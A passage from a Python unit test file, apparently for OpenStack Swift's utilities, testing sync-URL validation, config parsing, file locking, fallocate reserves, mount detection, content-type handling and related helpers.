(None, 'http://1.1.1.1/v1/a/c', None, None)),
('http://1.1.1.1:8080/a/c',
(None, 'http://1.1.1.1:8080/a/c', None, None)),
('http://2.2.2.2/a/c',
(None, 'http://2.2.2.2/a/c', None, None)),
('https://1.1.1.1/v1/a/c',
(None, 'https://1.1.1.1/v1/a/c', None, None)),
('//US/DFW1/a/c',
(None, 'http://dfw1.host/v1/a/c', 'US',
'9ff3b71c849749dbaec4ccdd3cbab62b')),
('//us/DFW1/a/c',
(None, 'http://dfw1.host/v1/a/c', 'US',
'9ff3b71c849749dbaec4ccdd3cbab62b')),
('//us/dfw1/a/c',
(None, 'http://dfw1.host/v1/a/c', 'US',
'9ff3b71c849749dbaec4ccdd3cbab62b')),
('//',
(None, None, None, None)),
('',
(None, None, None, None))):
if goodurl.startswith('//') and not realms_conf:
self.assertEqual(
utils.validate_sync_to(
goodurl, ['1.1.1.1', '2.2.2.2'], realms_conf),
(None, None, None, None))
else:
self.assertEqual(
utils.validate_sync_to(
goodurl, ['1.1.1.1', '2.2.2.2'], realms_conf),
result)
for badurl, result in (
('http://1.1.1.1',
('Path required in X-Container-Sync-To', None, None,
None)),
('httpq://1.1.1.1/v1/a/c',
('Invalid scheme \'httpq\' in X-Container-Sync-To, '
'must be "//", "http", or "https".', None, None,
None)),
('http://1.1.1.1/v1/a/c?query',
('Params, queries, and fragments not allowed in '
'X-Container-Sync-To', None, None, None)),
('http://1.1.1.1/v1/a/c#frag',
('Params, queries, and fragments not allowed in '
'X-Container-Sync-To', None, None, None)),
('http://1.1.1.1/v1/a/c?query#frag',
('Params, queries, and fragments not allowed in '
'X-Container-Sync-To', None, None, None)),
('http://1.1.1.1/v1/a/c?query=param',
('Params, queries, and fragments not allowed in '
'X-Container-Sync-To', None, None, None)),
('http://1.1.1.1/v1/a/c?query=param#frag',
('Params, queries, and fragments not allowed in '
'X-Container-Sync-To', None, None, None)),
('http://1.1.1.2/v1/a/c',
("Invalid host '1.1.1.2' in X-Container-Sync-To",
None, None, None)),
('//us/invalid/a/c',
("No cluster endpoint for 'us' 'invalid'", None,
None, None)),
('//invalid/dfw1/a/c',
("No realm key for 'invalid'", None, None, None)),
('//us/invalid1/a/',
("Invalid X-Container-Sync-To format "
"'//us/invalid1/a/'", None, None, None)),
('//us/invalid1/a',
("Invalid X-Container-Sync-To format "
"'//us/invalid1/a'", None, None, None)),
('//us/invalid1/',
("Invalid X-Container-Sync-To format "
"'//us/invalid1/'", None, None, None)),
('//us/invalid1',
("Invalid X-Container-Sync-To format "
"'//us/invalid1'", None, None, None)),
('//us/',
("Invalid X-Container-Sync-To format "
"'//us/'", None, None, None)),
('//us',
("Invalid X-Container-Sync-To format "
"'//us'", None, None, None))):
if badurl.startswith('//') and not realms_conf:
self.assertEqual(
utils.validate_sync_to(
badurl, ['1.1.1.1', '2.2.2.2'], realms_conf),
(None, None, None, None))
else:
self.assertEqual(
utils.validate_sync_to(
badurl, ['1.1.1.1', '2.2.2.2'], realms_conf),
result)
def test_TRUE_VALUES(self):
for v in utils.TRUE_VALUES:
self.assertEqual(v, v.lower())
def test_config_true_value(self):
orig_trues = utils.TRUE_VALUES
try:
utils.TRUE_VALUES = 'hello world'.split()
for val in 'hello world HELLO WORLD'.split():
self.assertTrue(utils.config_true_value(val) is True)
self.assertTrue(utils.config_true_value(True) is True)
self.assertTrue(utils.config_true_value('foo') is False)
self.assertTrue(utils.config_true_value(False) is False)
finally:
utils.TRUE_VALUES = orig_trues
def test_config_auto_int_value(self):
expectations = {
# (value, default) : expected,
('1', 0): 1,
(1, 0): 1,
('asdf', 0): ValueError,
('auto', 1): 1,
('AutO', 1): 1,
('Aut0', 1): ValueError,
(None, 1): 1,
}
for (value, default), expected in expectations.items():
try:
rv = utils.config_auto_int_value(value, default)
except Exception as e:
if e.__class__ is not expected:
raise
else:
self.assertEqual(expected, rv)
def test_streq_const_time(self):
self.assertTrue(utils.streq_const_time('abc123', 'abc123'))
self.assertFalse(utils.streq_const_time('a', 'aaaaa'))
self.assertFalse(utils.streq_const_time('ABC123', 'abc123'))
def test_replication_quorum_size(self):
expected_sizes = {1: 1,
2: 2,
3: 2,
4: 3,
5: 3}
got_sizes = dict([(n, utils.quorum_size(n))
for n in expected_sizes])
self.assertEqual(expected_sizes, got_sizes)
def test_rsync_ip_ipv4_localhost(self):
self.assertEqual(utils.rsync_ip('127.0.0.1'), '127.0.0.1')
def test_rsync_ip_ipv6_random_ip(self):
self.assertEqual(
utils.rsync_ip('fe80:0000:0000:0000:0202:b3ff:fe1e:8329'),
'[fe80:0000:0000:0000:0202:b3ff:fe1e:8329]')
def test_rsync_ip_ipv6_ipv4_compatible(self):
self.assertEqual(
utils.rsync_ip('::ffff:192.0.2.128'), '[::ffff:192.0.2.128]')
def test_rsync_module_interpolation(self):
fake_device = {'ip': '127.0.0.1', 'port': 11,
'replication_ip': '127.0.0.2', 'replication_port': 12,
'region': '1', 'zone': '2', 'device': 'sda1',
'meta': 'just_a_string'}
self.assertEqual(
utils.rsync_module_interpolation('{ip}', fake_device),
'127.0.0.1')
self.assertEqual(
utils.rsync_module_interpolation('{port}', fake_device),
'11')
self.assertEqual(
utils.rsync_module_interpolation('{replication_ip}', fake_device),
'127.0.0.2')
self.assertEqual(
utils.rsync_module_interpolation('{replication_port}',
fake_device),
'12')
self.assertEqual(
utils.rsync_module_interpolation('{region}', fake_device),
'1')
self.assertEqual(
utils.rsync_module_interpolation('{zone}', fake_device),
'2')
self.assertEqual(
utils.rsync_module_interpolation('{device}', fake_device),
'sda1')
self.assertEqual(
utils.rsync_module_interpolation('{meta}', fake_device),
'just_a_string')
self.assertEqual(
utils.rsync_module_interpolation('{replication_ip}::object',
fake_device),
'127.0.0.2::object')
self.assertEqual(
utils.rsync_module_interpolation('{ip}::container{port}',
fake_device),
'127.0.0.1::container11')
self.assertEqual(
utils.rsync_module_interpolation(
'{replication_ip}::object_{device}', fake_device),
'127.0.0.2::object_sda1')
self.assertEqual(
utils.rsync_module_interpolation(
'127.0.0.3::object_{replication_port}', fake_device),
'127.0.0.3::object_12')
self.assertRaises(ValueError, utils.rsync_module_interpolation,
'{replication_ip}::object_{deivce}', fake_device)
def test_fallocate_reserve(self):
class StatVFS(object):
f_frsize = 1024
f_bavail = 1
def fstatvfs(fd):
return StatVFS()
orig_FALLOCATE_RESERVE = utils.FALLOCATE_RESERVE
orig_fstatvfs = utils.os.fstatvfs
try:
fallocate = utils.FallocateWrapper(noop=True)
utils.os.fstatvfs = fstatvfs
# Want 1023 reserved, have 1024 * 1 free, so succeeds
utils.FALLOCATE_RESERVE = 1023
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
self.assertEqual(fallocate(0, 1, 0, ctypes.c_uint64(0)), 0)
# Want 1023 reserved, have 512 * 2 free, so succeeds
utils.FALLOCATE_RESERVE = 1023
StatVFS.f_frsize = 512
StatVFS.f_bavail = 2
self.assertEqual(fallocate(0, 1, 0, ctypes.c_uint64(0)), 0)
# Want 1024 reserved, have 1024 * 1 free, so fails
utils.FALLOCATE_RESERVE = 1024
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(0))
except OSError as err:
exc = err
self.assertEqual(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 1024')
# Want 1024 reserved, have 512 * 2 free, so fails
utils.FALLOCATE_RESERVE = 1024
StatVFS.f_frsize = 512
StatVFS.f_bavail = 2
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(0))
except OSError as err:
exc = err
self.assertEqual(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 1024')
# Want 2048 reserved, have 1024 * 1 free, so fails
utils.FALLOCATE_RESERVE = 2048
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(0))
except OSError as err:
exc = err
self.assertEqual(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 2048')
# Want 2048 reserved, have 512 * 2 free, so fails
utils.FALLOCATE_RESERVE = 2048
StatVFS.f_frsize = 512
StatVFS.f_bavail = 2
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(0))
except OSError as err:
exc = err
self.assertEqual(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 2048')
# Want 1023 reserved, have 1024 * 1 free, but file size is 1, so
# fails
utils.FALLOCATE_RESERVE = 1023
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(1))
except OSError as err:
exc = err
self.assertEqual(str(exc), 'FALLOCATE_RESERVE fail 1023 <= 1023')
# Want 1022 reserved, have 1024 * 1 free, and file size is 1, so
# succeeds
utils.FALLOCATE_RESERVE = 1022
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
self.assertEqual(fallocate(0, 1, 0, ctypes.c_uint64(1)), 0)
# Want 1023 reserved, have 1024 * 1 free, and file size is 0, so
# succeeds
utils.FALLOCATE_RESERVE = 1023
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
self.assertEqual(fallocate(0, 1, 0, ctypes.c_uint64(0)), 0)
# Want 1024 reserved, have 1024 * 1 free, and even though
# file size is 0, since we're under the reserve, fails
utils.FALLOCATE_RESERVE = 1024
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(0))
except OSError as err:
exc = err
self.assertEqual(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 1024')
finally:
utils.FALLOCATE_RESERVE = orig_FALLOCATE_RESERVE
utils.os.fstatvfs = orig_fstatvfs
def test_fallocate_func(self):
class FallocateWrapper(object):
def __init__(self):
self.last_call = None
def __call__(self, *args):
self.last_call = list(args)
self.last_call[-1] = self.last_call[-1].value
return 0
orig__sys_fallocate = utils._sys_fallocate
try:
utils._sys_fallocate = FallocateWrapper()
# Ensure fallocate calls _sys_fallocate even with 0 bytes
utils._sys_fallocate.last_call = None
utils.fallocate(1234, 0)
self.assertEqual(utils._sys_fallocate.last_call,
[1234, 1, 0, 0])
# Ensure fallocate calls _sys_fallocate even with negative bytes
utils._sys_fallocate.last_call = None
utils.fallocate(1234, -5678)
self.assertEqual(utils._sys_fallocate.last_call,
[1234, 1, 0, 0])
# Ensure fallocate calls _sys_fallocate properly with positive
# bytes
utils._sys_fallocate.last_call = None
utils.fallocate(1234, 1)
self.assertEqual(utils._sys_fallocate.last_call,
[1234, 1, 0, 1])
utils._sys_fallocate.last_call = None
utils.fallocate(1234, 10 * 1024 * 1024 * 1024)
self.assertEqual(utils._sys_fallocate.last_call,
[1234, 1, 0, 10 * 1024 * 1024 * 1024])
finally:
utils._sys_fallocate = orig__sys_fallocate
def test_generate_trans_id(self):
fake_time = 1366428370.5163341
with patch.object(utils.time, 'time', return_value=fake_time):
trans_id = utils.generate_trans_id('')
self.assertEqual(len(trans_id), 34)
self.assertEqual(trans_id[:2], 'tx')
self.assertEqual(trans_id[23], '-')
self.assertEqual(int(trans_id[24:], 16), int(fake_time))
with patch.object(utils.time, 'time', return_value=fake_time):
trans_id = utils.generate_trans_id('-suffix')
self.assertEqual(len(trans_id), 41)
self.assertEqual(trans_id[:2], 'tx')
self.assertEqual(trans_id[34:], '-suffix')
self.assertEqual(trans_id[23], '-')
self.assertEqual(int(trans_id[24:34], 16), int(fake_time))
def test_get_trans_id_time(self):
ts = utils.get_trans_id_time('tx8c8bc884cdaf499bb29429aa9c46946e')
self.assertEqual(ts, None)
ts = utils.get_trans_id_time('tx1df4ff4f55ea45f7b2ec2-0051720c06')
self.assertEqual(ts, 1366428678)
self.assertEqual(
time.asctime(time.gmtime(ts)) + ' UTC',
'Sat Apr 20 03:31:18 2013 UTC')
ts = utils.get_trans_id_time(
'tx1df4ff4f55ea45f7b2ec2-0051720c06-suffix')
self.assertEqual(ts, 1366428678)
self.assertEqual(
time.asctime(time.gmtime(ts)) + ' UTC',
'Sat Apr 20 03:31:18 2013 UTC')
ts = utils.get_trans_id_time('')
self.assertEqual(ts, None)
ts = utils.get_trans_id_time('garbage')
self.assertEqual(ts, None)
ts = utils.get_trans_id_time('tx1df4ff4f55ea45f7b2ec2-almostright')
self.assertEqual(ts, None)
def test_tpool_reraise(self):
with patch.object(utils.tpool, 'execute', lambda f: f()):
self.assertTrue(
utils.tpool_reraise(MagicMock(return_value='test1')), 'test1')
self.assertRaises(
Exception,
utils.tpool_reraise, MagicMock(side_effect=Exception('test2')))
self.assertRaises(
BaseException,
utils.tpool_reraise,
MagicMock(side_effect=BaseException('test3')))
def test_lock_file(self):
flags = os.O_CREAT | os.O_RDWR
with NamedTemporaryFile(delete=False) as nt:
nt.write("test string")
nt.flush()
nt.close()
with utils.lock_file(nt.name, unlink=False) as f:
self.assertEqual(f.read(), "test string")
# we have a lock, now let's try to get a newer one
fd = os.open(nt.name, flags)
self.assertRaises(IOError, fcntl.flock, fd,
fcntl.LOCK_EX | fcntl.LOCK_NB)
with utils.lock_file(nt.name, unlink=False, append=True) as f:
f.seek(0)
self.assertEqual(f.read(), "test string")
f.seek(0)
f.write("\nanother string")
f.flush()
f.seek(0)
self.assertEqual(f.read(), "test string\nanother string")
# we have a lock, now let's try to get a newer one
fd = os.open(nt.name, flags)
self.assertRaises(IOError, fcntl.flock, fd,
fcntl.LOCK_EX | fcntl.LOCK_NB)
with utils.lock_file(nt.name, timeout=3, unlink=False) as f:
try:
with utils.lock_file(
nt.name, timeout=1, unlink=False) as f:
self.assertTrue(
False, "Expected LockTimeout exception")
except LockTimeout:
pass
with utils.lock_file(nt.name, unlink=True) as f:
self.assertEqual(f.read(), "test string\nanother string")
# we have a lock, now let's try to get a newer one
fd = os.open(nt.name, flags)
self.assertRaises(
IOError, fcntl.flock, fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
self.assertRaises(OSError, os.remove, nt.name)
def test_lock_file_unlinked_after_open(self):
os_open = os.open
first_pass = [True]
def deleting_open(filename, flags):
# unlink the file after it's opened. once.
fd = os_open(filename, flags)
if first_pass[0]:
os.unlink(filename)
first_pass[0] = False
return fd
with NamedTemporaryFile(delete=False) as nt:
with mock.patch('os.open', deleting_open):
with utils.lock_file(nt.name, unlink=True) as f:
self.assertNotEqual(os.fstat(nt.fileno()).st_ino,
os.fstat(f.fileno()).st_ino)
first_pass = [True]
def recreating_open(filename, flags):
# unlink and recreate the file after it's opened
fd = os_open(filename, flags)
if first_pass[0]:
os.unlink(filename)
os.close(os_open(filename, os.O_CREAT | os.O_RDWR))
first_pass[0] = False
return fd
with NamedTemporaryFile(delete=False) as nt:
with mock.patch('os.open', recreating_open):
with utils.lock_file(nt.name, unlink=True) as f:
self.assertNotEqual(os.fstat(nt.fileno()).st_ino,
os.fstat(f.fileno()).st_ino)
def test_lock_file_held_on_unlink(self):
os_unlink = os.unlink
def flocking_unlink(filename):
# make sure the lock is held when we unlink
fd = os.open(filename, os.O_RDWR)
self.assertRaises(
IOError, fcntl.flock, fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
os.close(fd)
os_unlink(filename)
with NamedTemporaryFile(delete=False) as nt:
with mock.patch('os.unlink', flocking_unlink):
with utils.lock_file(nt.name, unlink=True):
pass
def test_lock_file_no_unlink_if_fail(self):
os_open = os.open
with NamedTemporaryFile(delete=True) as nt:
def lock_on_open(filename, flags):
# lock the file on another fd after it's opened.
fd = os_open(filename, flags)
fd2 = os_open(filename, flags)
fcntl.flock(fd2, fcntl.LOCK_EX | fcntl.LOCK_NB)
return fd
try:
timedout = False
with mock.patch('os.open', lock_on_open):
with utils.lock_file(nt.name, unlink=False, timeout=0.01):
pass
except LockTimeout:
timedout = True
self.assertTrue(timedout)
self.assertTrue(os.path.exists(nt.name))
def test_ismount_path_does_not_exist(self):
tmpdir = mkdtemp()
try:
self.assertFalse(utils.ismount(os.path.join(tmpdir, 'bar')))
finally:
shutil.rmtree(tmpdir)
def test_ismount_path_not_mount(self):
tmpdir = mkdtemp()
try:
self.assertFalse(utils.ismount(tmpdir))
finally:
shutil.rmtree(tmpdir)
def test_ismount_path_error(self):
def _mock_os_lstat(path):
raise OSError(13, "foo")
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
# Raises exception with _raw -- see next test.
utils.ismount(tmpdir)
finally:
shutil.rmtree(tmpdir)
def test_ismount_raw_path_error(self):
def _mock_os_lstat(path):
raise OSError(13, "foo")
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
self.assertRaises(OSError, utils.ismount_raw, tmpdir)
finally:
shutil.rmtree(tmpdir)
def test_ismount_path_is_symlink(self):
tmpdir = mkdtemp()
try:
link = os.path.join(tmpdir, "tmp")
os.symlink("/tmp", link)
self.assertFalse(utils.ismount(link))
finally:
shutil.rmtree(tmpdir)
def test_ismount_path_is_root(self):
self.assertTrue(utils.ismount('/'))
def test_ismount_parent_path_error(self):
_os_lstat = os.lstat
def _mock_os_lstat(path):
if path.endswith(".."):
raise OSError(13, "foo")
else:
return _os_lstat(path)
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
# Raises exception with _raw -- see next test.
utils.ismount(tmpdir)
finally:
shutil.rmtree(tmpdir)
def test_ismount_raw_parent_path_error(self):
_os_lstat = os.lstat
def _mock_os_lstat(path):
if path.endswith(".."):
raise OSError(13, "foo")
else:
return _os_lstat(path)
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
self.assertRaises(OSError, utils.ismount_raw, tmpdir)
finally:
shutil.rmtree(tmpdir)
def test_ismount_successes_dev(self):
_os_lstat = os.lstat
class MockStat(object):
def __init__(self, mode, dev, ino):
self.st_mode = mode
self.st_dev = dev
self.st_ino = ino
def _mock_os_lstat(path):
if path.endswith(".."):
parent = _os_lstat(path)
return MockStat(parent.st_mode, parent.st_dev + 1,
parent.st_ino)
else:
return _os_lstat(path)
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
self.assertTrue(utils.ismount(tmpdir))
finally:
shutil.rmtree(tmpdir)
def test_ismount_successes_ino(self):
_os_lstat = os.lstat
class MockStat(object):
def __init__(self, mode, dev, ino):
self.st_mode = mode
self.st_dev = dev
self.st_ino = ino
def _mock_os_lstat(path):
if path.endswith(".."):
return _os_lstat(path)
else:
parent_path = os.path.join(path, "..")
child = _os_lstat(path)
parent = _os_lstat(parent_path)
return MockStat(child.st_mode, parent.st_ino,
child.st_dev)
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
self.assertTrue(utils.ismount(tmpdir))
finally:
shutil.rmtree(tmpdir)
def test_parse_content_type(self):
self.assertEqual(utils.parse_content_type('text/plain'),
('text/plain', []))
self.assertEqual(utils.parse_content_type('text/plain;charset=utf-8'),
('text/plain', [('charset', 'utf-8')]))
self.assertEqual(
utils.parse_content_type('text/plain;hello="world";charset=utf-8'),
('text/plain', [('hello', '"world"'), ('charset', 'utf-8')]))
self.assertEqual(
utils.parse_content_type('text/plain; hello="world"; a=b'),
('text/plain', [('hello', '"world"'), ('a', 'b')]))
self.assertEqual(
utils.parse_content_type(r'text/plain; x="\""; a=b'),
('text/plain', [('x', r'"\""'), ('a', 'b')]))
self.assertEqual(
utils.parse_content_type(r'text/plain; x; a=b'),
('text/plain', [('x', ''), ('a', 'b')]))
self.assertEqual(
utils.parse_content_type(r'text/plain; x="\""; a'),
('text/plain', [('x', r'"\""'), ('a', '')]))
def test_override_bytes_from_content_type(self):
listing_dict = {
'bytes': 1234, 'hash': 'asdf', 'name': 'zxcv',
'content_type': 'text/plain; hello="world"; swift_bytes=15'}
utils.override_bytes_from_content_type(listing_dict,
logger=FakeLogger())
self.assertEqual(listing_dict['bytes'], 15)
self.assertEqual(listing_dict['content_type'],
'text/plain;hello="world"')
listing_dict = {
'bytes': 1234, 'hash': 'asdf', 'name': 'zxcv',
'content_type': 'text/plain; hello="world"; swift_bytes=hey'}
utils.override_bytes_from_content_type(listing_dict,
logger=FakeLogger())
self.assertEqual(listing_dict['bytes'], 1234)
self.assertEqual(listing_dict['content_type'],
'text/plain;hello="world"')
def test_clean_content_type(self):
subtests = {
'': '', 'text/plain': 'text/plain',
'text/plain; someother=thing': 'text/plain; someother=thing',
'text/plain; swift_bytes=123': 'text/plain',
'text/plain; someother=thing; swift_bytes=123':
'text/plain; someother=thing',
# Since Swift always tacks on the swift_bytes, clean_content_type()
# only strips swift_bytes if it's last. The next item simply shows
# that if for some other odd reason it's not last,
# clean_content_type() will not remove it from the header.
'text/plain; swift_bytes=123; someother=thing':
'text/plain; swift_bytes=123; someother=thing'}
for before, after in subtests.items():
self.assertEqual(utils.clean_content_type(before), after)
def test_quote(self):
res = utils.quote('/v1/a/c3/subdirx/')
assert res == '/v1/a/c3/subdirx/'
res = utils.quote('/v1/a&b/c3/subdirx/')
assert res == '/v1/a%26b/c3/subdirx/'
res = utils.quote('/v1/a&b/c3/subdirx/', safe='&')
assert res == '%2Fv1%2Fa&b%2Fc3%2Fsubdirx%2F'
unicode_sample = u'\uc77c\uc601'
account = 'abc_' + unicode_sample
valid_utf8_str = utils.get_valid_utf8_str(account)
account = 'abc_' + unicode_sample.encode('utf-8')[::-1]
invalid_utf8_str = utils.get_valid_utf8_str(account)
self.assertEqual('abc_%EC%9D%BC%EC%98%81',
utils.quote(valid_utf8_str))
self.assertEqual('abc_%EF%BF%BD%EF%BF%BD%EC%BC%9D%EF%BF%BD',
utils.quote(invalid_utf8_str))
def test_get_hmac(self):
self.assertEqual(
utils.get_hmac('GET', '/path', 1, 'abc'),
'b17f6ff8da0e251737aa9e3ee69a881e3e092e2f')
def test_get_policy_index(self):
# Account has no information about a policy
req = Request.blank(
'/sda1/p/a',
environ={'REQUEST_METHOD': 'GET'})
res = Response()
self.assertEqual(None, utils.get_policy_index(req.headers,
res.headers))
# The policy of a container can be specified by the response header
req = Request.blank(
'/sda1/p/a/c',
environ={'REQUEST_METHOD': 'GET'})
res = Response(headers={'X-Backend-Storage-Policy-Index': '1'})
self.assertEqual('1', utils.get_policy_index(req.headers,
res.headers))
# The policy of an object to be created can be specified by the request
# header
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Backend-Storage-Policy-Index': '2'})
res = Response()
self.assertEqual('2', utils.get_policy_index(req.headers,
res.headers))
def test_get_log_line(self):
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD', 'REMOTE_ADDR': '1.2.3.4'})
res = Response()
trans_time = 1.2
additional_info = 'some information'
server_pid = 1234
exp_line = '1.2.3.4 - - [01/Jan/1970:02:46:41 +0000] "HEAD ' \
'/sda1/p/a/c/o" 200 - "-" "-" "-" 1.2000 "some information" 1234 -'
with mock.patch(
'time.gmtime',
mock.MagicMock(side_effect=[time.gmtime(10001.0)])):
with mock.patch(
'os.getpid', mock.MagicMock(return_value=server_pid)):
self.assertEqual(
exp_line,
utils.get_log_line(req, res, trans_time, additional_info))
def test_cache_from_env(self):
# should never get logging when swift.cache is found
env = {'swift.cache': 42}
logger = FakeLogger()
with mock.patch('swift.common.utils.logging', logger):
self.assertEqual(42, utils.cache_from_env(env))
self.assertEqual(0, len(logger.get_lines_for_level('error')))
logger = FakeLogger()
with mock.patch('swift.common.utils.logging', logger):
self.assertEqual(42, utils.cache_from_env(env, False))
self.assertEqual(0, len(logger.get_lines_for_level('error')))
logger = FakeLogger()
with mock.patch('swift.common.utils.logging', logger):
self.assertEqual(42, utils.cache_from_env(env, True))
self.assertEqual(0, len(logger.get_lines_for_level('error')))
# check allow_none controls logging when swift.cache is not found
err_msg = 'ERROR: swift.cache could not be found in env!'
env = {}
logger = FakeLogger()
with mock.patch('swift.common.utils.logging', logger):
self.assertEqual(None, utils.cache_from_env(env))
self.assertTrue(err_msg in logger.get_lines_for_level('error'))
logger = FakeLogger()
with mock.patch('swift.common.utils.logging', logger):
self.assertEqual(None, utils.cache_from_env(env, False))
self.assertTrue(err_msg in logger.get_lines_for_level('error'))
logger = FakeLogger()
with mock.patch('swift.common.utils.logging', logger):
self.assertEqual(None, utils.cache_from_env(env, True))
self.assertEqual(0, len(logger.get_lines_for_level('error')))
def test_fsync_dir(self):
tempdir = None
fd = None
try:
tempdir = mkdtemp(dir='/tmp')
fd, temppath = tempfile.mkstemp(dir=tempdir)
_mock_fsync = mock.Mock()
_mock_close = mock.Mock()
with patch('swift.common.utils.fsync', _mock_fsync):
with patch('os.close', _mock_close):
utils.fsync_dir(tempdir)
self.assertTrue(_mock_fsync.called)
self.assertTrue(_mock_close.called)
self.assertTrue(isinstance(_mock_fsync.call_args[0][0], int))
self.assertEqual(_mock_fsync.call_args[0][0],
_mock_close.call_args[0][0])
# Not a directory - arg is file path
self.assertRaises(OSError, utils.fsync_dir, temppath)
logger = FakeLogger()
def _mock_fsync(fd):
raise OSError(errno.EBADF, os.strerror(errno.EBADF))
with patch('swift.common.utils.fsync', _mock_fsync):
with mock.patch('swift.common.utils.logging', logger):
utils.fsync_dir(tempdir)
self.assertEqual(1, len(logger.get_lines_for_level('warning')))
finally:
if fd is not None:
os.close(fd)
os.unlink(temppath)
if tempdir:
os.rmdir(tempdir)
def test_renamer_with_fsync_dir(self):
tempdir = None
try:
tempdir = mkdtemp(dir='/tmp')
# Simulate part of object path already existing
part_dir = os.path.join(tempdir, 'objects/1234/')
os.makedirs(part_dir)
obj_dir = os.path.join(part_dir, 'aaa', 'a' * 32)
obj_path = os.path.join(obj_dir, '1425276031.12345.data')
# Object dir had to be created
_m_os_rename = mock.Mock()
_m_fsync_dir = mock.Mock()
with patch('os.rename', _m_os_rename):
with patch('swift.common.utils.fsync_dir', _m_fsync_dir):
utils.renamer("fake_path", obj_path)
_m_os_rename.assert_called_once_with('fake_path', obj_path)
# fsync_dir on parents of all newly create dirs
self.assertEqual(_m_fsync_dir.call_count, 3)
# Object dir existed
_m_os_rename.reset_mock()
_m_fsync_dir.reset_mock()
with patch('os.rename', _m_os_rename):
with patch('swift.common.utils.fsync_dir', _m_fsync_dir):
utils.renamer("fake_path", obj_path)
_m_os_rename.assert_called_once_with('fake_path', obj_path)
# fsync_dir only on the leaf dir
self.assertEqual(_m_fsync_dir.call_count, 1)
finally:
if tempdir:
shutil.rmtree(tempdir)
def test_renamer_when_fsync_is_false(self):
_m_os_rename = mock.Mock()
_m_fsync_dir = mock.Mock()
_m_makedirs_count = mock.Mock(return_value=2)
with patch('os.rename', _m_os_rename):
with patch('swift.common.utils.fsync_dir', _m_fsync_dir):
with patch('swift.common.utils.makedirs_count',
_m_makedirs_count):
utils.renamer("fake_path", "/a/b/c.data", fsync=False)
_m_makedirs_count.assert_called_once_with("/a/b")
_m_os_rename.assert_called_once_with('fake_path', "/a/b/c.data")
self.assertFalse(_m_fsync_dir.called)
def test_makedirs_count(self):
tempdir = None
fd = None
try:
tempdir = mkdtemp(dir='/tmp')
os.makedirs(os.path.join(tempdir, 'a/b'))
# 4 new dirs created
dirpath = os.path.join(tempdir, 'a/b/1/2/3/4')
ret = utils.makedirs_count(dirpath)
self.assertEqual(ret, 4)
# no new dirs created - dir already exists
ret = utils.makedirs_count(dirpath)
self.assertEqual(ret, 0)
# path exists and is a file
fd, temppath = tempfile.mkstemp(dir=dirpath)
os.close(fd)
self.assertRaises(OSError, utils.makedirs_count, temppath)
finally:
if tempdir:
shutil.rmtree(tempdir)
class ResellerConfReader(unittest.TestCase):
def setUp(self):
self.default_rules = {'operator_roles': ['admin', 'swiftoperator'],
'service_roles': [],
'require_group': ''}
def test_defaults(self):
conf = {}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['AUTH_'])
self.assertEqual(options['AUTH_'], self.default_rules)
def test_same_as_default(self):
conf = {'reseller_prefix': 'AUTH',
'operator_roles': 'admin, swiftoperator'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['AUTH_'])
self.assertEqual(options['AUTH_'], self.default_rules)
def test_single_blank_reseller(self):
conf = {'reseller_prefix': ''}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, [''])
self.assertEqual(options[''], self.default_rules)
def test_single_blank_reseller_with_conf(self):
conf = {'reseller_prefix': '',
"''operator_roles": 'role1, role2'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, [''])
self.assertEqual(options[''].get('operator_roles'),
['role1', 'role2'])
self.assertEqual(options[''].get('service_roles'),
self.default_rules.get('service_roles'))
self.assertEqual(options[''].get('require_group'),
self.default_rules.get('require_group'))
def test_multiple_same_resellers(self):
conf = {'reseller_prefix': " '' , '' "}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, [''])
conf = {'reseller_prefix': '_, _'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['_'])
conf = {'reseller_prefix': 'AUTH, PRE2, AUTH, PRE2'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['AUTH_', 'PRE2_'])
def test_several_resellers_with_conf(self):
conf = {'reseller_prefix': 'PRE1, PRE2',
'PRE1_operator_roles': 'role1, role2',
'PRE1_service_roles': 'role3, role4',
'PRE2_operator_roles': 'role5',
'PRE2_service_roles': 'role6',
'PRE2_require_group': 'pre2_group'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['PRE1_', 'PRE2_'])
self.assertEqual(set(['role1', 'role2']),
set(options['PRE1_'].get('operator_roles')))
self.assertEqual(['role5'],
options['PRE2_'].get('operator_roles'))
self.assertEqual(set(['role3', 'role4']),
